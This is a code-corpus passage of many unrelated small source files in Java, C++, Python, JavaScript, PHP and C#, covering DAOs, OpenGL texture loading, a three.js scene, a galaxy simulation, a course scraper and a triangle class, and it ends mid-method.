import br.edu.ifsc.cds.classes.domain.Exercicio;
/**
*
 * Class that implements the {@link IExercicioDAO} interface for the database
 * operations
*
*/
public class ExercicioDAO implements IExercicioDAO {
protected EntityManager em;
@Override
public void create(Exercicio exercicio) {
try {
em = EntityMagerFactorySingleton.getFactory().createEntityManager();
em.getTransaction().begin();
em.persist(exercicio);
em.getTransaction().commit();
em.close();
} catch (Exception ex) {
ex.printStackTrace();
em.getTransaction().rollback();
}
}
@Override
public List<Exercicio> retrieveAll() {
List<Exercicio> exercicios = new ArrayList<>();
em = EntityMagerFactorySingleton.getFactory().createEntityManager();
Query query = em.createQuery("FROM Exercicio");
exercicios = query.getResultList();
em.close();
return exercicios;
}
@Override
public Exercicio retrieve(Integer id) {
em = EntityMagerFactorySingleton.getFactory().createEntityManager();
Exercicio exercicio = em.find(Exercicio.class, id);
em.close();
return exercicio;
}
@Override
public void update(Exercicio exercicio) {
try {
em = EntityMagerFactorySingleton.getFactory().createEntityManager();
em.getTransaction().begin();
em.merge(exercicio);
em.getTransaction().commit();
em.close();
} catch (Exception ex) {
ex.printStackTrace();
em.getTransaction().rollback();
}
}
@Override
public void delete(Integer id) {
try {
em = EntityMagerFactorySingleton.getFactory().createEntityManager();
Exercicio exercicio = em.find(Exercicio.class, id);
em.getTransaction().begin();
em.remove(exercicio);
em.getTransaction().commit();
em.close();
} catch (Exception ex) {
ex.printStackTrace();
}
}
@Override
public Exercicio retrieveDadosExer(String nome) {
em = EntityMagerFactorySingleton.getFactory().createEntityManager();
Query consulta = em.createQuery("SELECT e FROM Exercicio e WHERE e.nome = ?1").setParameter(1, nome);
return (Exercicio) consulta.getSingleResult();
}
}
|
C++
|
UTF-8
| 627 | 2.734375 | 3 |
[
"Zlib"
] |
permissive
|
#pragma once
#include <string>
namespace clan
{
	class NetGameConnection;
	class NetGameEvent;
}
class ServerPlayer
{
public:
ServerPlayer(clan::NetGameConnection *connection);
static ServerPlayer *get_player(clan::NetGameConnection *connection);
clan::NetGameConnection *get_connection() const { return connection; }
bool login(int player_id, const std::string &player_name);
bool is_logged_in() const { return id != 0; }
int get_id() const { return id; }
std::string get_name() const { return name; }
void send_event(const clan::NetGameEvent &game_event);
private:
clan::NetGameConnection *connection;
std::string name;
int id;
};
|
C++
|
UTF-8
| 3,149 | 2.765625 | 3 |
[] |
no_license
|
#include "TexturePack.h"
#include <ngl/rapidjson/document.h>
#include <fstream>
#include <iostream>
#include <ngl/Texture.h>
std::unordered_map<std::string,TexturePack::Textures> TexturePack::s_textures;
TexturePack::TexturePack()
{
}
TexturePack::~TexturePack()
{
}
TexturePack::Texture::Texture(GLint _location, const std::string &_name,const std::string &_path)
{
auto setTextureParams=[]()
{
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_REPEAT);
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_REPEAT);
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST_MIPMAP_LINEAR);
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST_MIPMAP_LINEAR);
};
location=_location;
name=_name;
ngl::Texture t(_path);
t.setMultiTexture(GL_TEXTURE0+location);
id=t.setTextureGL();
setTextureParams();
}
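// The JSON loaded below is expected to have roughly this shape (inferred from the parsing
// code: each top-level member has a "material" string and a "Textures" array whose entries
// carry "location", "name" and "path"). The concrete values are only an example:
//
// {
//   "BrickPack" : {
//     "material" : "brick",
//     "Textures" : [
//       { "location" : 0, "name" : "diffuse", "path" : "textures/brickDiffuse.png" },
//       { "location" : 1, "name" : "normal",  "path" : "textures/brickNormal.png" }
//     ]
//   }
// }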
bool TexturePack::loadJSON(const std::string &_filename)
{
bool success=false;
namespace rj=rapidjson;
std::ifstream file;
file.open(_filename.c_str(), std::ios::in);
if (file.fail())
{
std::cerr<<"error opening json file\n";
return false;
}
std::unique_ptr<std::string> source( new std::string((std::istreambuf_iterator<char>(file)), std::istreambuf_iterator<char>()) );
file.close();
// we need a mutable string for parsing so copy to a char * buffer
std::unique_ptr<char []> buffer(new char[source->size() + 1]); // +1 for the null terminator written below
memcpy(buffer.get(), source->c_str(), source->size());
// null terminate the string!
buffer[source->size()]='\0';
rj::Document doc;
if (doc.ParseInsitu<0>(buffer.get()).HasParseError())
{
std::cerr<<"Parse Error for file "<<_filename<<'\n';
return false;
}
if(!doc.HasMember("TexturePack"))
{
std::cerr<<"This does not seem to be a valid Texture Pack json file\n";
return false;
}
std::cout<<"***************Loading Texture Pack from JSON*****************\n";
// Now we iterate through the json and gather our data.
for (rj::Value::ConstMemberIterator itr = doc.MemberBegin(); itr != doc.MemberEnd(); ++itr)
{
Textures pack;
const rj::Value::Ch* material=itr->value["material"].GetString();
std::cout<<"found material "<< material<<'\n';
const rj::Value& textures = itr->value["Textures"];
for (rj::SizeType i = 0; i < textures.Size(); ++i)
{
const rj::Value &currentTexture = textures[i];
auto location=currentTexture["location"].GetInt();
const rj::Value::Ch *name=currentTexture["name"].GetString();
const rj::Value::Ch *path=currentTexture["path"].GetString();
std::cout<<"Found "<<name<<' '<<location<<' '<<path<<'\n';
Texture t(location,name,path);
pack.pack.push_back(t);
}
s_textures[material]=pack;
}
  success = true;
  return success;
}
bool TexturePack::activateTexturePack(const std::string &_tname)
{
bool success=false;
auto pack=s_textures.find(_tname);
// make sure we have a valid shader
if(pack!=s_textures.end())
{
success=true;
for(auto t : pack->second.pack)
{
glActiveTexture(GL_TEXTURE0+t.location);
glBindTexture(GL_TEXTURE_2D, t.id);
}
}
return success;
}
|
C++
|
UTF-8
| 391 | 2.734375 | 3 |
[] |
no_license
|
#include<iostream.h>
#include<conio.h>
double power(double,int);
void main()
{
clrscr();
double n,r;
int p,b;
cout<<"enter the number=";
cin>>n;
cout<<"\nenter the power=";
cin>>p;
r=power(n,p);
cout<<" \nresult= "<<r;
r=power(n,b=2);
// cout<<"\nresult= "<<r;
getch();
}
double power(double a,int b=2)
{
double x=1; int i;
for(i=1;i<=b;i++)
{
x=x*a;
}
return(x);
}
|
Python
|
UTF-8
| 329 | 3.796875 | 4 |
[] |
no_license
|
"""
Input example 1:
level
Output sample 1:
level
Yes
Input example 2:
1 + 2 = 2 + 1 =
Output sample 2:
1 + 2 = 2 + 1 =
No
"""
str = input()
flag = 1
for i in range(0,int(len(str)/2)):
if(str[i] != str[len(str) - 1 - i]):
flag = 0
if(flag == 1):
print(str)
print("Yes")
else:
print(str)
print("No")
|
JavaScript
|
UTF-8
| 1,713 | 3.03125 | 3 |
[
"MIT"
] |
permissive
|
'use strict'
/**
* The FileSystem helper used by the FileSystem extension.
*
* @module extensions/snapshot/FileSystem
*/
const path = require('path')
const fs = require('fs-extra')
/**
* Loads file content.
*
* @param {string} file - File path
* @param {string} [encoding='utf8'] - Content encoding
* @return {string} File content
*/
exports.getFileContent = (file, encoding = 'utf8') => {
const data = fs.readFileSync(file)
return data.toString(encoding)
}
/**
 * Writes content to a file.
* @param {string} file - File path
* @param {string} content - Content to write in the file
* @param {object} [options] - Options
* @param {boolean} [options.createDir = true] - Create path dir if it doesn't exists
*/
exports.writeFileContent = (file, content, { createDir = true } = {}) => {
if (createDir) exports.createDirectory(path.dirname(file))
return fs.writeFileSync(file, content)
}
/**
* Gets info about file/directory.
*
* @param {string} file - File path
* @return {fs.Stat|null} File/directory info or null if file/directory does not exist
*/
exports.getFileInfo = (file) => {
let result = null
try {
result = fs.statSync(file)
} catch (err) {
if (err.code !== 'ENOENT') throw err
}
return result
}
/**
* Creates a directory.
*
* @param {string} dir - directory path
* @return {boolean}
*/
exports.createDirectory = (dir) => {
return fs.mkdirsSync(dir)
}
/**
* Removes a file or directory.
*
* @param {string} fileOrDirectory - File or directory path
* @return {boolean}
*/
exports.remove = (fileOrDir) => {
return fs.removeSync(fileOrDir)
}
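/*
 * Example usage (illustrative only; the require path and file names are assumptions):
 *
 *   const fileSystem = require('./fileSystem')
 *
 *   fileSystem.writeFileContent('snapshots/example.snap', 'some content')
 *   const content = fileSystem.getFileContent('snapshots/example.snap')
 *   const info = fileSystem.getFileInfo('snapshots/example.snap') // null if it does not exist
 *   fileSystem.remove('snapshots')
 */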
|
Python
|
UTF-8
| 1,420 | 2.671875 | 3 |
[] |
no_license
|
import utility
import sys
import requests
import json
import csv
from bs4 import BeautifulSoup
def main():
utility.checkInput(["coursesFile", "outputFile", "quarterCode"],[])
utility.checkCred()
filename = sys.argv[1]
outputFilename = sys.argv[2]
quarterCode = sys.argv[3]
courses = utility.processData(filename, '\t')
cookie = utility.getCookie()
utility.checkQuarterCode(quarterCode, cookie)
scrapeWebReg(courses, outputFilename, quarterCode, cookie)
def scrapeWebReg(courses, outputFilename, quarterCode, cookie):
courseData = getCourseData(courses, quarterCode, cookie)
utility.printData(courseData, outputFilename)
def getCourseData(courses, quarterCode, cookie):
courseData = []
for x in range(0, len(courses)):
courseName = courses[x]['SUBJ_CODE'].strip()
courseCode = courses[x]['CRSE_CODE'].rstrip().replace(' ', '+');
utility.updateStatus("Getting course data for " + courseName + " " + courses[x]['CRSE_CODE'].strip())
headers = {
"Cookie": cookie
}
formatted = utility.WEBREG_COURSE_DATA.format(courseName, courseCode, quarterCode);
result = requests.get(formatted, headers=headers)
data = json.loads(result.content)
for obj in data:
courseData.append(obj)
sys.stdout.write('\n')
return courseData
if __name__ == "__main__":
main()
|
C++
|
UTF-8
| 792 | 2.703125 | 3 |
[
"MIT"
] |
permissive
|
#include "beverage.h"
void CaffeineBeverage::boilWater ()
{
printf("Boiling water ...\n");
}
void CaffeineBeverage::pourInCup ()
{
printf("Pouring into cup ...\n");
}
void CaffeineBeverage::prepareRecipe ()
{
boilWater();
brew();
pourInCup();
addCondiments();
}
void CaffeineBeverageWithHook::boilWater ()
{
printf("Boiling water ...\n");
}
void CaffeineBeverageWithHook::pourInCup ()
{
printf("Pouring into cup ...\n");
}
bool CaffeineBeverageWithHook::customerWantsCondiments ()
{
std::string answer = getUserInput();
return (answer == "yes" || answer == "y") ? true : false;
}
void CaffeineBeverageWithHook::prepareRecipe ()
{
boilWater();
brew();
pourInCup();
if (customerWantsCondiments()) addCondiments();
}
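// Illustrative only: prepareRecipe() is the template method, and a concrete subclass is
// expected to supply the primitive steps it calls (brew, addCondiments). The class below
// is an assumption to show the idea, not part of this project:
//
// class Coffee : public CaffeineBeverage
// {
//     void brew()          { printf("Dripping coffee through filter ...\n"); }
//     void addCondiments() { printf("Adding sugar and milk ...\n"); }
// };
//
// Coffee coffee;
// coffee.prepareRecipe();   // boil water, brew, pour into cup, add condiments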
|
Java
|
UTF-8
| 6,748 | 1.679688 | 2 |
[] |
no_license
|
package xgame.tools.config;
import java.io.File;
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;
import freemarker.template.Configuration;
import freemarker.template.ObjectWrapper;
import freemarker.template.TemplateExceptionHandler;
public class ToolsConf {
/**js文件写入开关*/
public static boolean file_write_switch_js=true;
/**消息写入开关*/
public static boolean file_write_switch_message=false;
/**java文件写入开关*/
public static boolean file_write_switch_sever=false;
public static String path_excel = "../../exls";
public static String path_json_client = "../../client/client_src/jsonFiles/";
public static String path_java_server = "../../server/mind-suport/src/main/java/com/globalgame/auto/json/";
public static String path_json_server = "../../server/mind-suport/src/main/json/";
public static String JAVA_SERVER_MESSAGE = "../../server/mind-server/src/main/java/com/mind/auto/msg/";
public static String JAVA_SERVER_MessageCode = "../../server/mind-server/src/main/java/com/mind/auto/msg/MessageCode.java";
// 0: normal; 1: login-server messages
public static int type = 0;
// public final static String CONFIG_FILE = "/tools.conf";
public static String MESSAGE_FILE = "../../message/message.xml";
public static String JS_MESSAGECODE = "../../client/client_src/message/MessageCode.js";
public static String JS_MESSAGE = "../../client/client_src/message/";
public final static String JAVA_OUT_PATH_TESTHANDLER_CLIENT = "../../server/mind-client/src/main/java/com/mind/test/TestHandler.java";
public static String JAVA_CLIENT_MessageCode = "../../server/mind-client/src/main/java/com/mind/auto/msg/MessageCode.java";
public static String JAVA_CLIENT_MESSAGE = "../../server/mind-client/src/main/java/com/mind/auto/msg/";
//xxx_json.java files
// directory where the generated json files are written
public static String js_jsonPath = "./client/client_src/json";
/**
 * The client's global json storage file
*/
public static String js_data_file_name="ConfigDataStorage.js";
// directory where the generated js files are written
public static String jsPath = "../../client/client_src/auto/";
private final static String ftl_dir = "/ftl";
// public static String JAVA_EXCEL2JSON_DATA_LOGIN = "../../../server/mind-suport/src/main/json/";
// public static String JAVA_EXCEL2JSON_SCHEMAL_LOGIN = "../../../server/mind-suport/src/main/java/com/globalgame/auto/json/";
public static String JAVA_FTL_MESSAGECODE = null;
public static String JAVA_FTL_SERVER = null;
public static String PACKAGE_NAME = "com.mind.auto.msg";
// 生成js text code 文件所在目录
// public static String RESOURCE_JS_TEXTCODE_DIR = "../../../client/client_src/common/BSTextCode.js";
// public static String JS_TEXTCODE_FTL_MESSAGECODE = null;
// public static String RESOURCE_JS_MUSICCODE_DIR = "../../../client/client_src/common/BSMusicCode.js";
// public static String JS_MUSICCODE_FTL_MESSAGECODE = null;
// public static String JAVA_TEXTCODE_FTL_MESSAGECODE = "java_textcode.ftl";
// public static String JAVA_EXCEL_TEXTCODE = "../../../server/mind-suport/src/main/java/com/globalgame/common/TextCodeConstants.java";
// // 资源存放位置
// public static String RESOURCE_GLOBAL_DIR = "../../../design/exls";
// public static int excelType=0;
private Configuration cfg;
private static ToolsConf conf = null;
public static String curPath = null;
private List<DataBigType> bigTypes = new ArrayList<DataBigType>();
private List<DataBaseType> baseTypes = new ArrayList<DataBaseType>();
public static ToolsConf getInstance() {
if (conf == null) {
conf = new ToolsConf();
}
return conf;
}
private void initFtl() {
// Initialize the FreeMarker configuration:
// - create a configuration instance
cfg = new Configuration();
// - set the template directory
cfg.setClassForTemplateLoading(this.getClass(), ftl_dir);
// - set the template update delay: 0 for testing, raise it in production
cfg.setTemplateUpdateDelay(0);
// - set the exception handler
cfg.setTemplateExceptionHandler(TemplateExceptionHandler.DEBUG_HANDLER);
cfg.setObjectWrapper(ObjectWrapper.BEANS_WRAPPER);
// - set the default template encoding
cfg.setDefaultEncoding("utf-8");
// - set the output encoding
cfg.setOutputEncoding("utf-8");
cfg.setLocale(Locale.SIMPLIFIED_CHINESE);
}
public void init() {
initFtl();
initDataBigTypes();
initDataBaseType();
initFile();
}
public Configuration getCfg() {
return cfg;
}
private void initDataBigTypes() {
String value = "base,0><base array,1><message,2><message array,3";
String[] types = value.split("><");
for (String type : types) {
String[] objs = type.split(",");
DataBigType bigType = new DataBigType(objs[0], Integer.parseInt(objs[1]));
bigTypes.add(bigType);
}
}
private void initFile() {
// initFile(ToolsConf.JAVA_EXCEL2JSON_SCHEMAL,
// ToolsConf.JAVA_SERVER_MESSAGE,
// ToolsConf.JAVA_CLIENT_MESSAGE,
// ToolsConf.JAVA_EXCEL2JSON_DATA,
// ToolsConf.JS_MESSAGE);
// create the message-related output directories
if( file_write_switch_message){
initFile(ToolsConf.JAVA_CLIENT_MESSAGE,ToolsConf.JAVA_SERVER_MESSAGE, ToolsConf.JS_MESSAGE);
}
// server output directories (guarded by the server switch)
if(file_write_switch_sever){
initFile(ToolsConf.path_java_server);
initFile(ToolsConf.path_json_server);
}
}
private void initFile(String... filePath){
for(String path:filePath){
File f = new File(path);
if (!f.exists()) {
System.out.println("创建文件夹.." + path);
f.mkdirs();
}
}
}
public int getMessageType() {
return type;
}
public List<DataBigType> getDataBigTypes() {
return bigTypes;
}
private void initDataBaseType() {
String value = "Byte--byte,byte,byte,0><Short--short,short,short,0><Integer--int,int,int,0><Long--long,long,long,0><Float--float,float,float,0><Double--double,double,double,0><String--string,String,string,0><Byte[]--byte*,byte,byte,1><Short[]--short*,short,short,1><Integer[]--int*,int,int,1><Long[]--long*,long,long,1><double[]--double*,double,double,1><String[]--string*,String,string,1";
String[] types = value.split("><");
for (String type : types) {
String[] objs = type.split(",");
int bigType = Integer.parseInt(objs[3]);
DataBaseType baseType = new DataBaseType(objs[0], objs[1], objs[2], getBigTypeByValue(bigType));
baseTypes.add(baseType);
}
}
public DataBigType getBigTypeByValue(int value) {
for (DataBigType bigType : bigTypes) {
if (bigType.getValue() == value) {
return bigType;
}
}
return null;
}
public List<DataBaseType> getDataBaseType() {
return baseTypes;
}
public String getCurPath() {
return curPath;
}
}
|
JavaScript
|
UTF-8
| 650 | 3.15625 | 3 |
[] |
no_license
|
window.onload = () => {
const sha256input_str = document.querySelector("#sha256input");
const sha256btn = document.querySelector("#sha256button");
const sha256output_str = document.querySelector("#sha256output");
    // Note: crypto.createHash is the Node.js API, so this assumes the script is bundled with a
    // Node-style `crypto` module; in a plain browser you would use crypto.subtle.digest instead.
    function sha256Encoder(input_str){
        return crypto.createHash('sha256').update(input_str).digest('hex');
    }
    sha256btn.addEventListener("click", () => {
        if(sha256input_str.value === ""){
            window.confirm("You have not provided an input string.")
            return;
        }
sha256output_str.value = sha256Encoder(sha256input_str.value);
console.log(sha256output_str.value);
})
}
|
Java
|
UTF-8
| 545 | 3.203125 | 3 |
[] |
no_license
|
package com.revature.wednesday;
public class Thursday {
public static boolean subString(String str,String str2) {
boolean a=false;
if (str2.length()>str.length()) {
a=false;
}
else {
for(int i=0;i<=(str.length()-str2.length());i++) {
if (str2.equals(str.substring(i, i+str2.length()))) {
a=true;
return true;
}
else {
a=false;
}
}
}
return a;
}
public static int triangle(int rows) {
if(rows==1) {
return 1;
}
return rows+triangle(rows-1);
}
}
|
Java
|
UTF-8
| 429 | 2.4375 | 2 |
[] |
no_license
|
package com.fzy;
import java.awt.*;
/**
* @Author Dayang
* @Date 2021/8/9
* @Version 1.7
*/
public class Rock extends Object{
Rock(){
this.x=(int)(Math.random()*700);
this.y=(int)(Math.random()*550+300);
this.width=71;
this.height=71;
this.flag=false;
this.m =150;
this.count =1;
this.img = Toolkit.getDefaultToolkit().getImage("imgs/rock1.png");
}
}
|
JavaScript
|
UTF-8
| 2,827 | 2.765625 | 3 |
[] |
no_license
|
import * as THREE from "three";
import Stats from "stats.js";
// Add the stats panel
const stats = initStats();
// シーンの作成
const scene = new THREE.Scene();
// カメラの作成
const camera = new THREE.PerspectiveCamera(
45,
window.innerWidth / window.innerHeight,
0.1,
1000
);
const renderer = new THREE.WebGLRenderer();
renderer.setClearColor(new THREE.Color(0xeeeeee));
renderer.setSize(window.innerWidth, window.innerHeight);
renderer.shadowMap.enabled = true;
// Axes helper
const axes = new THREE.AxesHelper(20);
scene.add(axes);
// plane
const planeGeometry = new THREE.PlaneGeometry(60, 20);
const planeMaterial = new THREE.MeshLambertMaterial({ color: 0xffffff });
const plane = new THREE.Mesh(planeGeometry, planeMaterial);
plane.receiveShadow = true;
plane.rotation.x = -0.5 * Math.PI;
plane.position.x = 15;
plane.position.y = 0;
plane.position.z = 0;
scene.add(plane);
// cube
const cubeGeometry = new THREE.BoxGeometry(4, 4, 4);
const cubeMaterial = new THREE.MeshLambertMaterial({
color: 0xff0000,
});
const cube = new THREE.Mesh(cubeGeometry, cubeMaterial);
cube.castShadow = true;
cube.position.x = -4;
cube.position.y = 3;
cube.position.z = 0;
scene.add(cube);
// sphere
const sphereGeometry = new THREE.SphereGeometry(4, 20, 20);
const sphereMaterial = new THREE.MeshLambertMaterial({
color: 0x7777ff,
});
const sphere = new THREE.Mesh(sphereGeometry, sphereMaterial);
sphere.castShadow = true;
sphere.position.x = 20;
sphere.position.y = 4;
sphere.position.z = 2;
scene.add(sphere);
camera.position.x = -30;
camera.position.y = 40;
camera.position.z = 30;
camera.lookAt(scene.position);
// spotlight
const spotLight = new THREE.SpotLight(0xffffff);
spotLight.position.set(-20, 30, -5);
spotLight.castShadow = true;
scene.add(spotLight);
document.getElementById("WebGL-output").appendChild(renderer.domElement);
var step = 0;
// Kick off rendering
renderScene();
/**
 * Render the scene (animation loop)
*/
function renderScene() {
stats.update();
cube.rotation.x += 0.02;
cube.rotation.y += 0.02;
cube.rotation.z += 0.02;
step += 0.04;
sphere.position.x = 20 + 10 * Math.cos(step);
sphere.position.y = 2 + 10 * Math.abs(Math.sin(step));
  // render via requestAnimationFrame (leave the render timing to the browser)
requestAnimationFrame(renderScene);
renderer.render(scene, camera);
}
/**
 * Initialize the stats panel
 * @returns the initialized stats component
*/
function initStats() {
var stats = new Stats();
stats.setMode(0);
stats.domElement.style.position = "absolute";
stats.domElement.style.left = "0px";
stats.domElement.style.top = "0px";
document.getElementById("Stats-output").appendChild(stats.domElement);
return stats;
}
|
Python
|
UTF-8
| 1,261 | 2.546875 | 3 |
[] |
no_license
|
import numpy
from amuse.lab import *
from amuse.ext.galactics_model import new_galactics_model
M_galaxy = 1.0e12 | units.MSun # Mass of the galaxy
R_galaxy = 10 | units.kpc # Radius of the galaxy
n_halo = 20000 # Number of particles for halo
n_bulge = 10000 # Number of particles for bulge
n_disk = 10000 # Number of particles for disk
# Converter: used to turn n-body system units to the physical units we are interested in
converter=nbody_system.nbody_to_si(M_galaxy, R_galaxy)
galaxy1 = new_galactics_model(n_halo,
converter,
bulge_number_of_particles=n_bulge,
disk_number_of_particles=n_disk)
# rotate function from the galactics_model module
galaxy1.rotate(0., numpy.pi/2, numpy.pi/4)
# Set position and velocity for the galaxy
galaxy1.position += [100.0, 100, 0] | units.kpc
galaxy1.velocity += [-10.0, 0.0, -10.0] | units.km/units.s
# Start SPH code
dynamics = Gadget2(converter, number_of_workers=4)
dynamics.parameters.epsilon_squared = (100 | units.parsec)**2 # Softening length
set1 = dynamics.particles.add_particles(galaxy1)
dynamics.particles.move_to_center()
t_end = 200 | units.Myr
# Evolve galactic model
dynamics.evolve_model(t_end)
|
PHP
|
UTF-8
| 1,781 | 3.09375 | 3 |
[] |
no_license
|
<?php
class User
{
private $db;
/**
* User constructor.
*/
public function __construct()
{
// init database
$this->db = new Database();
}
/*public function findUsersByEmail($email){
$this->db->query('SELECT * FROM employees WHERE email = :email');
$this->db->bind(':email', $email);
$row = $this->db->single();
if ($this->db->rowCount() > 0){
// there is an email found
return true;
}else{
return false;
}
}*/
public function findUsersByPseudo($pseudo){
$this->db->query('SELECT * FROM employees WHERE pseudo = :pseudo');
$this->db->bind(':pseudo', $pseudo);
$row = $this->db->single();
if ($this->db->rowCount() > 0){
// there is an email found
return true;
}else{
return false;
}
}
/*public function login($email, $password){
$this->db->query('SELECT * FROM employees WHERE email = :email and password = :password');
$this->db->bind(':email', $email);
$this->db->bind(':password', $password);
$row = $this->db->single();
if ($this->db->rowCount() > 0){
// user found
return $row;
}else{
return false;
}
}*/
public function login($pseudo, $password){
$this->db->query('SELECT * FROM employees WHERE pseudo = :pseudo and password = :password');
$this->db->bind(':pseudo', $pseudo);
$this->db->bind(':password', $password);
$row = $this->db->single();
if ($this->db->rowCount() > 0){
// user found
return $row;
}else{
return false;
}
}
}
|
Markdown
|
UTF-8
| 4,364 | 4.09375 | 4 |
[] |
no_license
|
# Chapter 4: Functions
## Calling functions
A program uses many functions. To use a function, we call it by name, for example:
```
>>> type(32)
<class 'int'>
```
In the example above, the name of the function is `type`. The expression inside the parentheses `()` is called the argument. An argument can be a value or a variable; it is the input of the function.
## Some built-in functions
max()
min()
len()
**Some type-conversion functions**
int()
float()
str()
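For example, each of these takes a value and converts it to the corresponding type:
```
>>> int('32')
32
>>> float(32)
32.0
>>> str(3.14159)
'3.14159'
```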
**The random module**
Before using it we must `import` the module.
For example, consider the following program:
```
import random
x = random.random()
print(x)
```
Running this program prints a random number between 0 and 1.
`random.randint(5, 10)` returns a random integer in the range `5 -> 10`.
To pick an arbitrary element from a sequence:
```
t = [1, 2, 3]
random.choice(t)
3
```
## The math module
The math module provides most of the common mathematical functions. Before using this module we must import it.
To use a function, we give the name of the module and then the name of the function, separated by a dot.
Example:
```
math.sin(0.7)
math.log10(100)
math.sqrt(2)
```
## Creating a new function
We can also create our own functions. For example:
```
def print_info():
print("Ho ten: Niemdt")
print("Tuoi: 18")
```
`def` is a keyword indicating that this is a function definition. `print_info` is the name of the function. The rules for function names are the same as the rules for variable names.
The parentheses after the function name are used to declare the function's parameters. In the example above, no arguments are passed to the function.
The first line of the definition is called the header; the following lines are called the body. By convention, each line of the body is indented by four spaces.
A function only runs when it is called. We can call one function inside another. For example:
```
def repeat_lyrics():
print_info()
print_info()
```
## Parameters and arguments
Some functions require arguments, and some need several arguments at once.
Inside a function, the argument passed in is assigned to a variable called a parameter. For example:
```
def print_twice(bruce):
print(bruce)
print(bruce)
```
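The argument is simply assigned to the parameter `bruce`, so any value that can be printed works:
```
>>> print_twice('Spam')
Spam
Spam
>>> print_twice(42)
42
42
```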
## Fruitful functions and void functions
When you call a function that returns a value, you can assign the result directly to a variable and use it. If you call such a function in interactive mode, the result is printed to the screen:
```
>>> math.sqrt(5)
2.23606797749979
```
But if you call it in a script without assigning it to a variable, you will not see its value.
If a function has no return value and you try to assign it to a variable anyway, the variable receives the special value `None`:
```
>>> result = print_twice('Bing')
Bing
Bing
>>> print(result)
None
```
To return a value, use the `return` statement in your function:
```
def addtwo(a, b):
added = a + b
return added
x = addtwo(3, 5)
print(x)
```
Running this program prints the value `8`.
## Why functions?
There are several reasons why it is worth splitting a program into functions:
* It makes the program easier to read, understand, and debug.
* It can make the program shorter by removing repeated code. If you want to change that code, you only have to edit the function.
* When something breaks, you can test each function separately, know exactly where the error is, and fix it easily.
* If a function is well written and bug-free, you can reuse it in many programs.
|
Java
|
UTF-8
| 3,899 | 2.375 | 2 |
[] |
no_license
|
package protese.dao.servico;
import java.util.ArrayList;
import java.util.List;
import javax.persistence.Query;
import protese.dao.cliente.ClienteDebitoDao;
import protese.jpa.interfaces.Dao;
import protese.model.cliente.Cliente;
import protese.model.cliente.ClienteDebito;
import protese.model.servico.Servico;
import protese.model.servico.ServicoDebito;
/**
*
* @author Vinicius Silveira
*/
public class ServicoDebitoDao extends Dao<ServicoDebito> {
private static ServicoDebitoDao unique = null;
private ClienteDebitoDao clienteDebitoDao = ClienteDebitoDao.getInstance();
private ServicoDebitoDao() {
}
public static ServicoDebitoDao getInstance() {
if (unique == null) {
unique = new ServicoDebitoDao();
}
return unique;
}
public ServicoDebito salvar(ServicoDebito servicoDebito) {
try {
servicoDebito = super.gravar(servicoDebito);
} catch (Exception e) {
}
return servicoDebito;
}
public ServicoDebito deletar(ServicoDebito servicoDebito) {
try {
servicoDebito.setExcluido(true);
servicoDebito = salvar(servicoDebito);
} catch (Exception e) {
}
return servicoDebito;
}
public List<ServicoDebito> retornaTodosAtivosPorCliente(Cliente cliente) {
List<ServicoDebito> resultset = new ArrayList();
Query query = createQuery("SELECT servicoDebito FROM ServicoDebito AS servicoDebito "
+ " INNER JOIN servicoDebito.idclienteDebito AS clienteDebito "
+ " INNER JOIN servicoDebito.idservico AS servico "
+ " WHERE servicoDebito.excluido = false "
+ " AND servico.excluido = false "
+ " AND clienteDebito.excluido = false "
+ " AND servico.dataFinalizacao IS NULL "
+ " AND servico.idcliente = :cliente "
+ " ORDER BY clienteDebito.data DESC");
query.setParameter("cliente", cliente);
resultset = query.getResultList();
return resultset;
}
public ServicoDebito salvarServicoDebito(ClienteDebito clienteDebito, Servico servico) {
ServicoDebito servicoDebito = new ServicoDebito();
servicoDebito.setIdservico(servico);
servicoDebito.setIdclienteDebito(clienteDebito);
return salvar(servicoDebito);
}
public boolean verificaAgregarDebitos(Servico servico) {
List<ClienteDebito> clienteDebitoList = clienteDebitoDao.retornaTodosNaoUtilizadosPorCliente(servico.getIdcliente());
for (ClienteDebito debito : clienteDebitoList) {
ServicoDebito servicoDebito = new ServicoDebito();
servicoDebito.setIdservico(servico);
servicoDebito.setIdclienteDebito(debito);
salvar(servicoDebito);
}
return !clienteDebitoList.isEmpty();
}
public List<ServicoDebito> retornaTodosPorServico(Servico servico) {
List<ServicoDebito> resultset = new ArrayList();
Query query = createQuery("SELECT servicoDebito FROM ServicoDebito AS servicoDebito "
+ " INNER JOIN servicoDebito.idclienteDebito AS clienteDebito "
+ " INNER JOIN servicoDebito.idservico AS servico "
+ " WHERE servicoDebito.excluido = false "
+ " AND servico.excluido = false "
+ " AND clienteDebito.excluido = false "
+ " AND servicoDebito.idservico = :servico "
+ " ORDER BY clienteDebito.data DESC");
query.setParameter("servico", servico);
resultset = query.getResultList();
return resultset;
}
}
|
C#
|
UTF-8
| 2,192 | 3.375 | 3 |
[] |
no_license
|
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace lab8t1
{
class TTriangle
{
public double AB;
public double AC;
public double BC;
public double k;
TTriangle()
{
this.AB = 0;
this.AC = 0;
this.BC = 0;
}
public TTriangle(double AB, double AC, double BC)
{
this.AB = AB;
this.AC = AC;
this.BC = BC;
}
public TTriangle(TTriangle text)
{
this.AB = text.AB;
this.AC = text.AC;
this.BC = text.BC;
}
public double perimeterTriangle()
{
double P = AB + BC + AC;
return P;
}
public double areaTriangle()
{
double p = perimeterTriangle() / 2;
double S = Math.Sqrt(p * (p - AB) * (p - AC) * (p - BC));
return S;
}
public string seedsTriangle()
{
return $"AB: {AB}, AC:{AC}, BC:{BC}";
}
public string comparisonTriangle(TTriangle otherTriangle)
{
if (perimeterTriangle() == otherTriangle.perimeterTriangle())
{
return "Трикутники рівні";
}
else
{
return "Трикутники не рівні";
}
}
public static TTriangle operator + ( TTriangle triangle,TTriangle randTriangle)
{
return new TTriangle(triangle.AB + randTriangle.AB,triangle.AC+randTriangle.AC,
triangle.BC+randTriangle.BC);
}
public static TTriangle operator -(TTriangle triangle, TTriangle randTriangle)
{
return new TTriangle(triangle.AB - randTriangle.AB, triangle.AC - randTriangle.AC,
triangle.BC - randTriangle.BC);
}
public static TTriangle operator *(TTriangle triangle, double k)
{
